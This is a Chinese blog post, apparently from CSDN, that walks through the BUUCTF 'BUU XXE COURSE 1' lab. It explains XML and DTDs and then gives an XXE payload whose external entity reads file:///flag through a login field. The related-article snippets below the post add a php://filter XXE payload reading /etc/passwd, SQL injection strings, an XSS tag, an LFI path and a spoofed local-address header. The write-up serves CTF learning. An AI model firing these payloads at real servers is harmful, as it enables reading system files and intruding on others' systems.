BUU XXE COURSE 1 1 解题过程

已于 2024-06-23 16:37:04 修改
阅读量1k 收藏 5
点赞数 10
分类专栏: CTF杂记 文章标签: 前端
于 2024-06-23 16:34:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42515203/article/details/139901735
版权

通过使用BurpSuite工具抓包可以得出此题使用的是XML注入。

XML原理

xml是一种类似与html的文本标记语言,与HTML不同的是,xml的作用是传输数据,而不是显示数据。

xml语言是定义一个根元素,下面跟上若干对子元素。

XML DTD

为了规范文档的格式,可以在文件头部编写 XML DTD;

XML DTD 还可以指定为本地的DTD文件或网络文件;

引用实体

在Burp中代替xml部分代码,运行结果如下:

BUU XXE COURSE 1 1 解题步骤

在xml中引用实体,调出本地的flag文件;

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE root [
    <!ENTITY admin SYSTEM "file:///flag">
    ]>
<root>
    <username> &admin; </username>
    <password> admin </password>

</root>

结果:

XML实体支持的协议

【CTF练习】BUU XSS COURSE 1(XSS获取cookie登录)
m0_73866435的博客
02-28 4808
有两个尝试点。
BUUCTF Basic 解题记录--BUU XXE COURSE
weixin_43171033的博客
10-08 731
2、了解了XXE漏洞,用burpsuite获取到的url转发给repeater,修改XML的信息,引入外部实体漏洞,修改发送内容,即可查看到flag信息。定义admin的外部实体,里面的命令是查看flag的信息。
BUUCTF/BUU XXE COURSE 1
weixin_44041994的博客
03-22 1322
xxe全称是"xml external entity injection",意为xml外部实体注入。服务端接收和解析来自用户端的xml数据,而没有做严格的安全控制,从而导致xml外部实体注入。原理是攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行。通过brup suite抓包发现,数据包上传的是xml数据。随意输入数据并登录,发现弹窗。打开页面发现是一个登录页面。所以可能存在xxe漏洞。输入flag,闯关成功。
BUU XXE COURSE 1 【basic】
weixin_52942048的博客
10-07 538
看到username取到了admin变量的内容。发现请求参数是xml格式。
XXE之执行命令 BUU XXE COURSE 1
weixin_73049307的博客
10-03 872
接下来就直接读取flag文件(用SYSTEM "file:///flag")执行命令。其实上一部分的XXE之探测内网端口的例题就用到了执行命令的知识SYSTEM ""发现onclick事件触发XML_Function()函数,说明传输方式是XML。先输入admin 123456,点击“GO!F12查看一下按键“GO!说明存在XXE-XML漏洞。
BUU XXE COURSE
m0_62879498的博客
03-26 4110
BUU XXE COURSE 我们发现输入得用户名以 弹窗(alert) 的形式输出 同时 F12 进行前端查看 发现 在提交按钮处有 <button id="go" onclick="XMLFunction()">GO!</button> 说明我们的 数据传输方式为 xml 当然,我们也可以直接 在burp suite 进行抓包查看 我们看到了 xml 文档声明: <?xml version="1.0" encoding="UTF-8"?> 所以,可能存在 xx
XXE学习(with BUU XXE COURSE1)
I_ET5u5的博客
04-13 637
进行一个XXE的学
【CTF Web】XCTF GFSJ0485 simple_php Writeup(代码审计+GET请求+PHP弱类型漏洞)
HEX9CF的技术博客
05-06 584
小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。
BUU XSS COURSE 1
分享
07-27 2656
BUU XSS COURSE 1
BUU LFI COURSE 1-1
fdmssmf的博客
08-05 3059
BUU LFI COURSE 1 1 直接url后面添加/?file=/flag
BUU BURP COURSE 1【basic】
weixin_52942048的博客
10-07 1063
(2) remote_addr、X-Real-IP、X-Forwarded-For,这3个头参数需要详细了解。(1) 看到这里估计就蒙了,这怎么玩?这提示就是伪造一个本地请求,就是头信息中传一个127.0.0.1
BUUCTF--BUU XSS COURSE
qq_46263951的博客
07-18 4315
吐槽<img scr="javascript.:alert('xss');">可以发现这里存在一个存储型XSS漏洞
------已搬运-------xxe入门学习--------BUUCTF:[NCTF2019]Fake(True) XML cookbook---------jarvisoj的API调用
Zero_Adam的博客
02-16 687
目录:一、XML基础知识:二、应用场景:例题:1. buu的[NCTF2019]Fake XML cookbook2. jarvisoj的API调用 一、XML基础知识: 这两个都不错 https://blog.youkuaiyun.com/gavin_john/article/details/51532756 https://blog.youkuaiyun.com/bylfsj/article/details/101441734 这个就离谱。直接xxe全部学完了,学精通了,,暂时不用看这个,, https://xz.aliyun
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 7755
参考之前写的:https://blog.youkuaiyun.com/qq_39583774/article/details/120722112?此题详解可以看:https://blog.youkuaiyun.com/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
BUUCTF通关 - 2
weixin_65279640的博客
04-14 2181
buuctf通关2
XSS跨站脚本攻击(基础详解)
永远都没有了
01-10 3685
一次xss的备忘本,xss攻击有很多操作我都还没学会带入真正的实战,等实战成功我会再总结一篇
2025.2.5——一、BUU XSS COURSE 1 XSS漏洞|XSS平台搭建
最新发布
2402_87387800的博客
02-05 610
题目来源:BUUCTF BUU XSS COURSE 1
BUU SQL COURSE 11
WEB渗透测试 从入门到萌新
04-19 1539
打开之后 F12查看 http://7a0c2d1a-3ae3-4815-850d-9e229cef2e1f.node4.buuoj.cn:81/backend/content_detail.php?id=1 找到注入点 sql手工注入流程 1、判断注入类型 ?id=1 or 1=1 ?id=1' or '1'='1 2、判断列数:?id=1 order by 1,2,3 3、判断注入点:?id=-1 union select 1?id=-1 union select 1,2,3 ..
BUU XXE COURSE 1 1
01-30
### 关于BUU XXE Course Materials #### XML外部实体漏洞概述 XML外部实体(XXE)漏洞允许攻击者通过利用应用程序解析XML输入的方式,读取本地文件、执行远程代码或发起其他类型的攻击。在某些情况下,如果应用程序未能正确验证或过滤用户提交的XML数据,则可能受到此类攻击的影响[^1]。 #### 构造恶意XML Payloads 当`usename`和`password`字段都存在XXE漏洞时,可以通过构造特定形式的XML来触发这些漏洞。例如,在一个典型的登录表单中,可以创建如下所示带有内部定义实体引用的payload: ```xml <!DOCTYPE root[ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> ]> <root> <username>&file;</username> </root> ``` 此代码片段展示了如何使用PHP流封装器绕过简单的防火墙规则并获取敏感信息[^5]。 #### 外部实体声明与文档结构 对于包含标准前缀如`<?xml version="1.0" encoding="UTF-8"?>` 的XML文档来说,确保其遵循正确的语法非常重要。这不仅有助于提高兼容性和可移植性,而且还可以防止潜在的安全风险。特别是当涉及到DTD (Document Type Definition) 定义部分时更应如此,因为这是引入外部资源的主要途径之一[^2]。 #### 数据交换而非展示目的 值得注意的是,尽管XML看起来类似于HTML,但它主要用于描述结构化数据而不是呈现网页内容。因此,在设计API接口或其他基于Web的服务端点时,应该特别注意保护那些接受XML作为输入的地方免受各种形式的数据操纵威胁[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值